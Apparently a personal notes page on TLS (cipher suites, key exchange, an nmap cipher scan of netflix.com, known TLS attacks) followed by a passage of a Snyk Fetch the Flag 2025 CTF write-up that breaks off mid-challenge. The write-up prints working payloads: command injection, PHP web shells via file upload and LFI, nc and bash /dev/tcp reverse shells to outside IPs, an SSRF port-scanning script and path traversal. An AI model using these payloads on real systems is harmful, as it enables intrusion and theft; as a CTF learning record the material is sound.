    Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x0039)
    Cipher Suite: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013)
    Cipher Suite: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA (0xc009)
    Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA (0x0033)
    Cipher Suite: TLS_ECDHE_RSA_WITH_RC4_128_SHA (0xc011)
    Cipher Suite: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA (0xc007)
    Cipher Suite: TLS_RSA_WITH_AES_128_GCM_SHA256 (0x009c)
    Cipher Suite: TLS_RSA_WITH_AES_256_CBC_SHA (0x0035)
    Cipher Suite: TLS_RSA_WITH_AES_128_CBC_SHA (0x002f)
    Cipher Suite: TLS_RSA_WITH_RC4_128_SHA (0x0005)
    Cipher Suite: TLS_RSA_WITH_RC4_128_MD5 (0x0004)
    Cipher Suite: TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x000a)
    Cipher Suite: TLS_EMPTY_RENEGOTIATION_INFO_SCSV (0x00ff)

References
- Transport Layer Security (TLS) Parameters : https://www.iana.org/assignments/tls-parameters/tls-parameters.xhtml
- TLS Cipher Suites Pre-build List : >(https://www.iana.org/assignments/tls-parameters/tls-parameters.xhtml#tls-parameters-4)

Key Exchange

First, We need to generate seed value (Secret key for HMAC, Secret key for Symmetric Encryption)

Note > From this seed value any number of keys can be generate in future for both parties so key exchange is one time process.

Here are numbers of algorithms for key exchange,
1. PSK
2. RSA
3. DH
4. ECDH
5. DHE
6. ECDHE

PSK (Pre-Shared Key)

it will not provides forward secrecy.

RSA (Rivest-Shamir-Adleman)

it will not provides forward secrecy.

DH (Diffie-Helman)

DH (Diffie-Helman) Variations,
- Elliptic curve Diffie-Helman Ephemeral (DE Parameters are temporary into cert and key file) ECDHE provides forward secrecy. (More Efficient and Secure then DHE)
- DHE Diffie-Helman Ephemeral provides forward secrecy.
- Elliptic curve Diffie-Helman ECDH (DE Parameters are static into cert and key file) will not provides forward secrecy.(More Efficient and Secure then DH)
- Diffie-Helman DH will not provides forward secrecy.
- Parameters such as P, G, Private Key

Forward Secrecy

Definition : " Once encrypted always encrypted " meaning that asymmetric private key never compromise whether we are using it or not.
Without Forward Secrecy
The Parameters (P, G, Private Key) are statically stored in private key itself which is not safe because attacker get that private key by chance then it can generate seed value out of it.

With Forward Secrecy
For ECDHE and DHE the Parameters (P, G, Private Key) are discarded after getting seed value so even if attacker gets the private key it can't get the seed.

Avoid, Accept, Prefer

Authentication

Verify if server is truly who they say are
Here are numbers of algorithms for authentication,
1. PSK
2. DSS
3. RSA
4. ECDSA

PSK

DSS (Digital Signature Standard)

DSA
- Random Number is very important
- MUST be unique for each message or DSA fails catastrophically
- If Random # is ever re-used, Private Key can be extracted
- RFC 6979 u— Generate random # deterministically based on Message

RSA vs DSS (DSA)

Summary :- Between RSA and DSS, RSA better performing in terms of security and largely acceptance

RSA vs ECDSA

Summary :- Between RSA and ECDSA .. choose ECDSA

Note > 
> BUT, you don't actually have to choose - you can use both!
> Cipher Suite is selected before Certificate is sent
> If client only supports RSA: present RSA certificate
> If client supports RSA or ECDSA: present ECDSA certificate

Avoid, Accept, Prefer

Encryption

Here are numbers of Encryption algorithms,
Red: Stream Cipher, Green: Block Cipher
- CHACHA20
- AES-256-GCM
- AES-128-GCM
- AES-256-CBC
- AES-128-CBC
- 3DES-CBC
- RC4-128
- DES-CBC

Key Sizes
< 128 bits : not secure
= 128 bits : secure
> 128 bits : very secure

Block cipher vs Stream Cipher

What is Diffusion?

Block Cipher Modes

CBC (Cipher Block Chaining)

it suffers from "padding oracle"
Cannot be parallelized (next block is dependent on previous one makes it slower)
Encryption

Decryption

CTR (Counter)

Cipher blocks are not tied to blocks before or after so its vulnerable to changing block in cipher text so must pair with MAC know as Galois Counter Mode (GCM).
its a AEAD (Authenticated Encryption with Associated Data) cipher
- can do symmetric encryption and MAC at the same time
Can be parallelized
Encryption / Decryption

3DES-CBC, RC4-128, DES-CBC

AES-128/256-GCM/CBC

Given 2 Encryption Algorithms are known to be much secure then other two.

ChaCha20

Summarization

Summary :-
- AEAD (Authenticated Encryption with Associated Data) ciphers provide both confidentiality and integrity by combining encryption and authentication in a single operation.
- Examples: ChaCha20-Poly1305, AES-CCM (Counter with CBC-MAC Mode), AES-GCM (Galois/Counter Mode), AES-GCM-SIV (Synthetic Initialization Vector), OCB (Offset Codebook Mode)

Avoid, Accept, Prefer

Hashing

Hashing algorithm which will be used as a MAC (Message Authentication Code) Provides Integrity and Authentication for Bulk Data
- Poty1305
- SHA384
- SHA256
- SHA
- MD5

MD5

SHA-1/256/384/512

SHA1 Family

SHA-2 Family

Poly1305

Avoid, Accept, Prefer

Cipher Suites Task

Netflix Cipher Suite Analysis

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-23 00:28 IST
Nmap scan report for netflix.com (54.73.148.110)
Host is up (0.16s latency).
Other addresses for netflix.com (not scanned): 18.200.8.190 54.155.246.232 2a05:d018:76c:b685:c898:aa3a:42c7:9d21 2a05:d018:76c:b684:b233:ac1f:be1f:7 2a05:d018:76c:b683:e1fe:9fbf:c403:57f1
rDNS record for 54.73.148.110: ec2-54-73-148-110.eu-west-1.compute.amazonaws.com

PORT    STATE SERVICE        VERSION
443/tcp open  ssl/http-proxy (bad gateway)
| ssl-enum-ciphers: 
|   TLSv1.0: 
|     ciphers: 
|       TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (ecdh_x25519) - A
|       TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (ecdh_x25519) - A
|       TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A
|       TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A
|     compressors: 
|       NULL
|     cipher preference: server
|   TLSv1.1: 
|     ciphers: 
|       TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (ecdh_x25519) - A
|       TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (ecdh_x25519) - A
|       TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A
|       TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A
|     compressors: 
|       NULL
|     cipher preference: server
|   TLSv1.2: 
|     ciphers: 
|       TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (ecdh_x25519) - A
|       TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (ecdh_x25519) - A
|       TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (ecdh_x25519) - A
|       TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (ecdh_x25519) - A
|       TLS_RSA_WITH_AES_128_GCM_SHA256 (rsa 2048) - A
|       TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A
|       TLS_RSA_WITH_AES_256_GCM_SHA384 (rsa 2048) - A
|       TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A
|     compressors: 
|       NULL
|     cipher preference: server
|   TLSv1.3: 
|     ciphers: 
|       TLS_AKE_WITH_AES_128_GCM_SHA256 (ecdh_x25519) - A
|       TLS_AKE_WITH_AES_256_GCM_SHA384 (ecdh_x25519) - A
|       TLS_AKE_WITH_CHACHA20_POLY1305_SHA256 (ecdh_x25519) - A
|     cipher preference: client
|_  least strength: A
|_http-server-header: envoy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 502 Bad Gateway
|     Via: 1.1 i-0aba3ec878b310dc9 (eu-west-1)
|     X-Originating-URL: https://100.86.75.66/nice%20ports%2C/Tri%6Eity.txt%2ebak
|     Set-Cookie: nfvdid=BQFmAAEBEIdGmZncsdqD_2VD-Pr0zWJA9x9aJw1FMTZTb0NkJIQPaAs0R5lb3RYJrtJSa6ZebRN9sSeehEbz9cV_qcrsSAAn9GHxBxPeslAht6l9IVBBeg%3D%3D; Domain=.netflix.com; Path=/; Max-Age=31536000
|     X-Netflix.nfstatus: 2_16
|     X-Netflix.proxy.execution-time: 1378
|     transfer-encoding: chunked
|     Connection: close
|   GetRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Length: 7
|     Connection: close
|     BLOCKED
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Content-Length: 0
|     Access-Control-Allow-Origin: *
|     Access-Control-Allow-Credentials: true
|     Allow: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS, SCRIPT
|     Access-Control-Allow-Methods: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS, SCRIPT
|     Accept-CH: Sec-CH-UA-Model,Sec-CH-UA-Platform-Version
|_    Access-Control-Allow-Headers: Authorization,Content-Type,Content-Encoding,Accept,X-Netflix.application.name,X-Netflix.application.version,X-Netflix.esn,X-Netflix.device.type,X-Netflix.certification.version,X-Netflix.request.uuid,X-Netflix.originating.request.uuid,X-Netflix.user.id,X-Netflix.oauth.consumer.key,X-Netflix.oauth.token,X-Netflix.ichnaea.request.type,X-Netflix.Request.Routing,X-NETFLIX-PREAPP-PARTNER-ID,X-NETFLIX-PREAPP-INTEGRITY-VALUE,X-Netflix.Request.Priority,X-Netflix.Retry.Client.Policy,X-Netflix.Client.Request.Name,X-Netflix.Request.Retry.Policy,X-Netflix.Request.Retry
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port443-TCP:V=7.94SVN%T=SSL%I=7%D=2/23%Time=67BA1E7B%P=x86_64-pc-linux-
SF:gnu%r(GetRequest,47,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Length
SF::\x207\r\nConnection:\x20close\r\n\r\nBLOCKED")%r(HTTPOptions,893,"HTTP
SF:/1\.1\x20200\x20OK\r\nContent-Length:\x200\r\nAccess-Control-Allow-Orig
SF:in:\x20\*\r\nAccess-Control-Allow-Credentials:\x20true\r\nAllow:\x20GET
SF:,\x20HEAD,\x20POST,\x20PUT,\x20DELETE,\x20TRACE,\x20OPTIONS,\x20SCRIPT\
SF:r\nAccess-Control-Allow-Methods:\x20GET,\x20HEAD,\x20POST,\x20PUT,\x20D
SF:ELETE,\x20TRACE,\x20OPTIONS,\x20SCRIPT\r\nAccept-CH:\x20Sec-CH-UA-Model
SF:,Sec-CH-UA-Platform-Version\r\nAccess-Control-Allow-Headers:\x20Authori
SF:zation,Content-Type,Content-Encoding,Accept,X-Netflix\.application\.nam
SF:e,X-Netflix\.application\.version,X-Netflix\.esn,X-Netflix\.device\.typ
SF:e,X-Netflix\.certification\.version,X-Netflix\.request\.uuid,X-Netflix\
SF:.originating\.request\.uuid,X-Netflix\.user\.id,X-Netflix\.oauth\.consu
SF:mer\.key,X-Netflix\.oauth\.token,X-Netflix\.ichnaea\.request\.type,X-Ne
SF:tflix\.Request\.Routing,X-NETFLIX-PREAPP-PARTNER-ID,X-NETFLIX-PREAPP-IN
SF:TEGRITY-VALUE,X-Netflix\.Request\.Priority,X-Netflix\.Retry\.Client\.Po
SF:licy,X-Netflix\.Client\.Request\.Name,X-Netflix\.Request\.Retry\.Policy
SF:,X-Netflix\.Request\.Retry")%r(FourOhFourRequest,1C7,"HTTP/1\.1\x20502\
SF:x20Bad\x20Gateway\r\nVia:\x201\.1\x20i-0aba3ec878b310dc9\x20\(eu-west-1
SF:\)\r\nX-Originating-URL:\x20https://100\.86\.75\.66/nice%20ports%2C/Tri
SF:%6Eity\.txt%2ebak\r\nSet-Cookie:\x20nfvdid=BQFmAAEBEIdGmZncsdqD_2VD-Pr0
SF:zWJA9x9aJw1FMTZTb0NkJIQPaAs0R5lb3RYJrtJSa6ZebRN9sSeehEbz9cV_qcrsSAAn9GH
SF:xBxPeslAht6l9IVBBeg%3D%3D;\x20Domain=\.netflix\.com;\x20Path=/;\x20Max-
SF:Age=31536000\r\nX-Netflix\.nfstatus:\x202_16\r\nX-Netflix\.proxy\.execu
SF:tion-time:\x201378\r\ntransfer-encoding:\x20chunked\r\nConnection:\x20c
SF:lose\r\n\r\n0\r\n\r\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.05 seconds

TLSv1.3 (Most Secure)
Client Side Cipher Suites
- TLS_AKE_WITH_AES_128_GCM_SHA256 (ecdh_x25519) - Grade A
- TLS_AKE_WITH_AES_256_GCM_SHA384 (ecdh_x25519) - Grade A
- TLS_AKE_WITH_CHACHA20_POLY1305_SHA256 (ecdh_x25519) - Grade A
✅ Security Notes:
- TLS 1.3 removes all weak ciphers and uses only AEAD encryption (AES-GCM, ChaCha20).
- No RSA key exchange (only ECDHE, which supports forward secrecy).
- TLS 1.3 cipher preference is client-driven, unlike earlier versions.

TLSv1.2 (Secure)
Server-Proposed Cipher Suites
- TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (ecdh_x25519) - Grade A
- TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (ecdh_x25519) - Grade A
- TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (ecdh_x25519) - Grade A
- TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (ecdh_x25519) - Grade A
- TLS_RSA_WITH_AES_128_GCM_SHA256 (rsa 2048) - Grade A
- TLS_RSA_WITH_AES_256_GCM_SHA384 (rsa 2048) - Grade A
- TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - Grade A
- TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - Grade A
✅ Security Notes:
- TLS 1.2 supports modern cryptographic algorithms (AES-GCM).
- AES-CBC is not ideal due to previous padding oracle vulnerabilities.
- RSA-based key exchange is not forward secure, but ECDHE provides forward secrecy..

TLSv1.0 (Insecure & Deprecated)
Server-Proposed Cipher Suites:
- TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (ecdh_x25519) - Grade A
- TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (ecdh_x25519) - Grade A
- TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - Grade A
- TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - Grade A
❌ Security Notes:
- TLS 1.0 is vulnerable to BEAST attacks (CBC mode attack).
- Uses weaker key exchange mechanisms, lacks modern AEAD ciphers.
- No protection against downgrade attacks.
- Officially deprecated – should be disabled in favor of TLS 1.2 or 1.3.

TLSv1.1 (Insecure & Deprecated)
Server-Proposed Cipher Suites:
- TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (ecdh_x25519) - Grade A
- TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (ecdh_x25519) - Grade A
- TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - Grade A
- TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - Grade A
❌ Security Notes:
- No major improvements over TLS 1.0.
- Still vulnerable to BEAST and downgrade attacks.
- Lacks AES-GCM and other modern cryptographic enhancements.
- Officially deprecated – should be disabled in favor of TLS 1.2 or 1.3.
Summary
- Conclusion:
  1. Also TLS 1.0 and 1.1 is supported but not in used by Netflix.
  2. TLS 1.2 is secure but should prioritize AES-GCM over CBC.
  3. TLS 1.3 is the best, with ChaCha20 and AES-GCM offering strong encryption.
  4. Server prefers TLS 1.2 and 1.3 ciphers, but TLS 1.3 ciphers are client-driven
If Netflix's clients support TLS 1.3, they should prioritize ChaCha20 or AES-GCM for maximum security.

Attacks on TLS

1. SSL 3.0 (Predecessor of TLS)

POODLE (Padding Oracle On Downgraded Legacy Encryption) [2014]
- Exploits SSL 3.0's fallback to CBC mode, allowing attackers to decrypt data.
- Mitigation: Disable SSL 3.0 and use TLS 1.2+.

2. TLS 1.0 & TLS 1.1

BEAST (Browser Exploit Against SSL/TLS) [2011]
- Affects TLS 1.0 (and SSL 3.0), allowing attackers to decrypt cookies via CBC attacks.
- Mitigation: Use AES-GCM or TLS 1.2+.
LUCKY13 (Timing Attack on CBC Mode) [2013]
- Exploits how TLS handles CBC padding, leading to plaintext recovery.
- Mitigation: Use AEAD ciphers like AES-GCM or TLS 1.2+.
CRIME (Compression Ratio Info-leak Made Easy) [2012]
- Targets TLS compression (e.g., DEFLATE) to steal session cookies.
- Mitigation: Disable TLS compression.
RC4 Weaknesses
- TLS 1.0/1.1 allowed RC4, which has significant cryptographic weaknesses.
- Mitigation: Disable RC4.

3. TLS 1.2

DROWN (Decrypting RSA with Obsolete and Weakened eNcryption) [2016]
- Exploits servers supporting both TLS and vulnerable SSLv2, allowing RSA decryption.
- Mitigation: Disable SSLv2.
ROBOT (Return of Bleichenbacher's Oracle Threat) [2017]
- A padding oracle attack against RSA encryption in TLS.
- Mitigation: Use modern key exchange algorithms (ECDHE, DHE).
FREAK (Factoring RSA Export Keys) [2015]
- Exploits weak RSA "export-grade" keys to break encryption.
- Mitigation: Disable weak ciphers.
Logjam [2015]
- Exploits weak Diffie-Hellman parameters, allowing an attacker to downgrade key exchanges.
- Mitigation: Use at least 2048-bit DH parameters or ECDH.
SWEET32 [2016]
- Exploits small block ciphers (e.g., 3DES) using birthday attacks.
- Mitigation: Disable 3DES.
Padding Oracle Attacks (e.g., Vaudenay’s attack)
- Exploits CBC mode's padding error responses.
- Mitigation: Use AEAD ciphers like AES-GCM.
Session Resumption Hijacking
- If a session ticket is stolen, it can be used to impersonate a client.
- Mitigation: Rotate session keys frequently.

4. TLS 1.3 (Latest and Most Secure)

TLS 1.3 was designed to eliminate older vulnerabilities, but new theoretical attacks still exist.

Downgrade Attacks (Forced TLS 1.2) [2018]
- Attackers force a downgrade to TLS 1.2 by manipulating handshake messages.
- Mitigation: TLS 1.3 uses downgrade detection.
Curve25519 Key Exchange Timing Attacks
- Side-channel attacks on ECC cryptography.
- Mitigation: Constant-time implementations.
Encrypted Client Hello (ECH) Attacks
- Potential weaknesses in ECH if implemented incorrectly.
- Mitigation: Proper implementation and updates.

TLS Version	Major Attacks	Mitigation
SSL 3.0	POODLE (Padding Oracle On Downgraded Legacy Encryption)	Disable SSL 3.0
TLS 1.0 & 1.1	BEAST (CBC attack), LUCKY13 (Padding attack), CRIME (Compression attack), RC4 Weaknesses	Disable CBC mode, RC4, TLS compression
TLS 1.2	DROWN (SSLv2 flaw), ROBOT (RSA padding attack), FREAK (Weak RSA keys), Logjam (Weak DH parameters), SWEET32 (3DES birthday attack), Padding Oracle Attacks, Session Resumption Hijacking	Disable weak ciphers, use AEAD ciphers like AES-GCM, use strong DH/ECDH parameters
TLS 1.3	Downgrade Attacks (forcing TLS 1.2), ECC Timing Attacks (Curve25519), Encrypted Client Hello (ECH) vulnerabilities	Use modern cryptography, downgrade detection, constant-time implementations

TLS/SSL Handshake

Records and its parameters

Multiple Records can be sent at a time with different parameters

Record Header

Change Cipher Specs

Alert Record

Handshake Records

There are certain fields which sends encrypted.

Client Hello

Server hello

Certificate

Server Key Exchange

Server Hello Done

Client Key Exchange

Application Data

This MAC-then-Encrypt is vulnerable to Padding Oracle On Downgraded Legacy Encryption (Poodle) attack because padding is seprated.

Actual Handshake

Working Flow of TLS Handshake

![[TLS Handshake Excalidraw]]

Client Hello

Server Hello

Certificate

Server Hello Done

Client Key Exchange

Client Generates a PreMasterSecret
- Used for generate session keys

Why 4 Symmetric Session Keys??

Abstract >
> Client and Server creates two different tunnel for data transfer one for client to server` and another for server to client.
> If Attacker by chance successful to bruteforce one pair or keys then they only able to compromise half of conversations.

Hint >
> In this demonstration we have used RSA but there are other algorithms like ECDHE and DHE which has some different mechanisms.

Change Cipher Spec from Client to Server

Indicates that client has everything necessary to speak securely

Finished from Client to Server

Change Cipher Spec from Server to Client

Indicates that server has everything necessary to speak securely

Finished from Server to Client

Application Data

Snyk Fetch The Flag Writeups Feb 2025

Fri, 28 Feb 2025 00:00:00 GMT

Snyk Fetch the Flag 2025

Into to Our Team:

Jeel (B14cky) : https://b14cky.vercel.app/
- Skill Area : Forensics, Cryptography, Pwn, Reverse Engineering
Parth (M0n4rch) : https://parth-m0n4rch.vercel.app/
- Skill Area : Web, OSINT, Coding, Steganography
Yash (k3t0n) :
- Skill Area : Web, OSINT, Cryptography, Coding, Reverse Engineering, Steganography

Warmups

1. Zero Ex Six One

Given File: flag.txt.encry

flag.txt.encry

Hex Data

07 0d 00 06 1a 02 54 51 05 59 53 02 51 00 53 54 07 52 04 
57 55 55 05 51 56 51 53 03 55 50 05 03 05 51 59 54 00 1c 6b

As per challenge description we can understand it says something like 0x61 and it is a XOR challenge so i try to XOR Hex data with this using (https://www.dcode.fr/xor-cipher) Site and boom got the flag.

flag{c50d82c0a25f3e644d0702b41dbd085a}

2. Read The Rules

In this challenge, a link labeled "Read The Rules" was provided. Clicking on it redirected me to a page containing the competition rules.

To find any hidden information, I inspected the source code of the page and searched for "flag{". This revealed the hidden flag within the code.

flag{90bc54705794a62015369fd8e86e557b}

3. Technical Support

The given link redirected to a Discord page, which contained an invite link to the Snyk Discord server (DevSecCon - Your DevSecOps Community).

Following the hint from the previous text, I navigated to the #open-help-ticket channel, where the flag was located.

flag{d7aa66eaOedd20221820c84ecc47aee9}

4. CTF 101

Given File: challenge.zip

CTF101.zip

By analyzing the source code, I discovered that the application was vulnerable to command injection.

To exploit this, I attempted a basic command to read the flag file:

; cat flag.txt

This successfully displayed the flag.

flag{3b74fc0628299870edabc5072b25cf78}

5. Science 100

We are given a netcat (nc) connection and must interact with a system that resembles the hacking mechanic from *Fallout: New Vegas*. In the game, terminals use a "likeness" system, where each incorrect attempt provides a count of how many letters are correctly positioned. Our goal is to find the correct password using this mechanic.

nc challenge.ctf.games 32586

Fallout terminals use a likeness system where each attempt tells you how many letters are in the correct position. so i guess MOUNTAIN
and i get a likeness of 0 out of 8 , the correct password has exactly matching letters in the same spots. so the correct password is does not contain any letter from here so my next Logic Guess was one From this
PRODUCER (Does not contain I, A, N in same positions)
AUTONOMY (Does not contain I, A, N in same positions)
And when Tried PRODUCER i got the access and then we got to select 2 option for Flag

flag{89e575e7272b07a1d33e41e3647b3826}

6. Screaming Crying Throwing up

screaming.bin

a̮ăaa̋{áa̲aȧa̮ȧaa̮áa̲a̧ȧȧa̮ȧaa̲a̧aa̮ȧa̲aáa̮a̲aa̲a̮aaa̧}

By Opening the file we got this text which is looks like flag but it is encrypted.
After some research i found that this is Stream Cipher ( https://www.explainxkcd.com/wiki/index.php/3054:_Scream_Cipher ).
From this site i got this mapping table of each cipher character mapped to its corresponding plain text character.

So I try to find some decoder to decode this and got this one https://scream-cipher.netlify.app/ after lots of searching.
I paste the cipher and boom got the flag.. 🫠

flag{edabfbafedcbbfbadcafbdaefdadfaac}

Web

1. Who is JH

Given Files: Source code of the web app.

challenge.zip

Explored the webapp, different pages. Found a file upload functionality at /upload.php

Exploring /conspiracy.php
- /conspiracy.php?language=languages/english.php
- /conspiracy.php?language=languages/french.php
Randomly tried removing php files and we got php error. It indicated possible LFI vulnerability

The language parameter in the URL is being passed to include(), which attempts to load a file. Since PHP is throwing a warning, it means the file does not exist or isn't accessible.
Tried other possible ways to get it list directories or access files but no luck.

Now lets try to upload php files. However, only allowed extensions are .jpg, .png and `.gif``
Tried diff. php extension (php, php3, php4, php5, phtml, phps, phar, jpg.php etc.) to bypass it but only image extension at the end works.
So tried .php.jpg extension and file uploaded.

Now to execute the file we need to find the location of the file uploaded.
There is a /asset directory but it contains static images, so not useful.
Randomly guessed /uploads directory but it gives 403 forbidden error. We can also check the source code of the web app which is already given. So we are sure that our uploaded file is stored in /upload directory.
Tried directly accessing the file /upload/first.php.jpg - it says file not found.
Again checked the source code and found that the file name is being changed using uniqid() function when we upload the file.

Since the code renames files as uniqid() . "_$originalName", the final filename is unpredictable.
uniqid() generates a random unique ID. So we cannot brute force the file name. Our file name will be like 65dfe1b12345_first.php.jpg
In the given files, we have log.php file which which shows /logs/site_log.txt file where all the site logs are being stored

Checked the identified log file. Logs exposes the changed file name of our uploaded file.

Now we know the filename -- tried accessing our file directly but its not executing the php code. It means we have to exploit the LIF vulnerability which we found earlier to move further.
I tried directly accessing our uploaded file like in below image and we are able to do it -- no error

To double check -- uploaded php file with below code and its working fine

<?php phpinfo(); ?>

Now lets go for reverse shell. I tried pentest monkey's php rev shell but its not working. Also tried direct rev shell with the below code but it is also not working

<?php system("nc -e /bin/sh 172.21.42.246 4444"); ?>

I noticed in phpinfo that some important functions are disabled, so we might not be able to take reverse shell.

Need to find another way.. searched on google for alternative ways to get reverseshell and found something related to webshell. I used chatgpt to know more about it and get the php code for it.
If all command execution functions are blocked, we inject a web shell that uses PHP functions only, like this:

<?php if(isset($_REQUEST['cmd'])) { echo "<pre>"; print_r(scandir($_REQUEST['cmd'])); echo "</pre>"; } ?>

Uploaded the file with above code and executed it like below and got the directories listed

Now we can check where flag.txt is present.

flag.txt is present in / directory. Now again I used chatgpt to get the code for displaying the content of flag.txt

<?php
if(isset($_REQUEST['cmd'])) {
    echo "<pre>";
    echo file_get_contents($_REQUEST['cmd']);
    echo "</pre>";
}
?>

Upload this code file and execute it. We will get the flag

flag{65586Ø8db04Ød1c64358ad536a8eØ6c6)

2. Unfurl

Given File: challenge.zip

unfurl.zip

When I first saw the Open Source Link Unfurler challenge, it seemed like a simple web application that fetches metadata from URLs. However, after diving into the code, I discovered a complex vulnerability chain involving SSRF (Server-Side Request Forgery) and command injectio that eventually led to capturing the flag.
Challenge Overview
The application consists of:
- A public-facing web app allowing users to enter URLs and view their metadata
- A hidden admin panel running on a random port
- A vulnerable command execution feature in the admin panel

I began by examining the source code provided in the challenge. The application was built with Express.js and had these main components:

app.js: The main public application running on port 5000

admin.js: A separate admin panel running on a random port between 1024-4999

Various route handlers for both apps

After analyzing the code, I identified two key vulnerabilities:

Server-Side Request Forgery (SSRF) in the /unfurl endpoint:

// No validation on the URL parameter
router.post('/unfurl', async (req, res) => {
const { url } = req.body;
// ...
const response = await axios.get(url);
// ...
});

Command Injection in the admin panel's /execute endpoint:

router.get('/execute', (req, res) => {
// Weak IP check
if (clientIp !== '127.0.0.1' && clientIp !== '::1') {
return res.status(403).send('Forbidden');
}
const cmd = req.query.cmd;
// Direct execution without sanitization
exec(cmd, (error, stdout, stderr) => {
// ...
});
});

And also by using Snyk it was confirm that this application has this vulnerability.

My strategy became clear:
1. Use the SSRF vulnerability to scan for the admin port
2. Access the admin panel through the SSRF vulnerability
3. Exploit the command injection to read the flag file
Finding the Admin Port
- I wrote a Python script to systematically scan for the admin port:

import requests
import concurrent.futures

def check_port(port, base_url="http://challenge.ctf.games:30959"):
    try:
        unfurl_endpoint = f"{base_url}/unfurl"
        target_url = f"http://127.0.0.1:{port}"

        response = requests.post(
            unfurl_endpoint,
            json={"url": target_url},
            timeout=5
        )

        if response.status_code == 200:
            data = response.json()
            if "Admin Panel" in data.get("title", "") or "Admin Panel" in data.get("html", ""):
                print(f"✅ FOUND ADMIN PORT: {port}")
                return port
    except Exception as e:
        pass
    return None

def find_admin_port(start_port=1024, end_port=4999, threads=10):
    print(f"Starting scan for admin port...")

    with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
        futures = {executor.submit(check_port, port): port for port in range(start_port, end_port + 1)}

        for i, future in enumerate(concurrent.futures.as_completed(futures)):
            result = future.result()
            if result is not None:
                return result

    return None

admin_port = find_admin_port()

After running the script, I found the admin panel running on port 1174.(Claude assisted me in developing this charming code that helps me discover the admin port.)

When I first tried to access the execute endpoint at /admin/execute, I consistently got 404 errors.
I also attempted sophisticated command injection payloads like reverse shells before confirming basic command execution worked:

/admin/execute?cmd=bash%20-c%20%27bash%20-i%20%3E&%20/dev/tcp/192.168.29.54/4444%200%3E&1%27

I spent time trying to determine if the unfurler was making proper HTTP requests or if there were additional protections in place.
In the above image it showed that requests to the root path (/) were working, but /admin/execute was failing. This was my "aha" moment - the admin routes were mounted at the root level, not under /admin/!
I then tried:

http://127.0.0.1:2901/execute?cmd=ls

And got a successful response showing the directory contents!

With the correct path to the command execution endpoint, getting the flag was simple:

http://127.0.0.1:2901/execute?cmd=cat flag.txt

When I submitted this URL to the unfurler, it retrieved the flag file content and displayed it in the results section.

flag{e1c96ccca8777b15bd0b0c7795d018ed}

3. TimeOff

Given File: Challenge.zip

timeoff.zip

This was a challenging and fun web exploitation challenge involving a Ruby on Rails time-off management application. The goal was to find and exploit a vulnerability to retrieve a flag hidden somewhere in the system. The challenge required careful code analysis and exploiting a path traversal vulnerability.
Upon examining the provided source code, I found several controller files that handle different aspects of the application:
Upon examining the provided source code, I found several controller files that handle different aspects of the application:
application_controller.rb: Handles authentication
document_controller.rb: Manages document downloads
file_controller.rb: Provides file access functionality
time_off_requests_controller.rb: Manages time-off requests and their documents
user_controller.rb: Handles user management
The included Dockerfile revealed a crucial piece of information:

COPY flag.txt /timeoff_app/flag.txt

This confirmed the flag was located at /timeoff_app/flag.txt in the container.
FilesController.rb
Initially, the FilesController appeared to be a goldmine. It contained a glaring path traversal vulnerability:

class FilesController < ApplicationController
  def show
    path = params[:path]

    begin
      content = File.read(path)
      render plain: content
    rescue => e
      render plain: "Error reading file: #{e}"
    end
  end
end

This controller read files directly from user input without any validation - a perfect opportunity for exploitation. However, after examining the routes.rb file, I discovered this controller wasn't actually being used in the application! The route wasn't defined, making this vulnerability inaccessible.
Further analysis revealed a more subtle vulnerability in the document download functionality. In document_controller.rb:

def download
  @document = Document.find(params[:id])
  base_directory = Rails.root.join("public", "uploads")
  path_to_file = File.join(base_directory, @document.name)

  if File.exist?(path_to_file)
    send_file path_to_file,
            filename: @document.file_path.presence || "document",
            type: "application/octet-stream"
  else
    flash[:alert] = "File not found: #{path_to_file}"
    redirect_back(fallback_location: root_path)
  end
end

This code uses @document.name to construct the file path without proper validation, potentially allowing path traversal.
The attack path became clear:
Login to the application

When trying to download the document, I received an error:

File not found: /timeoff_app/public/uploads/../../../flag.txt

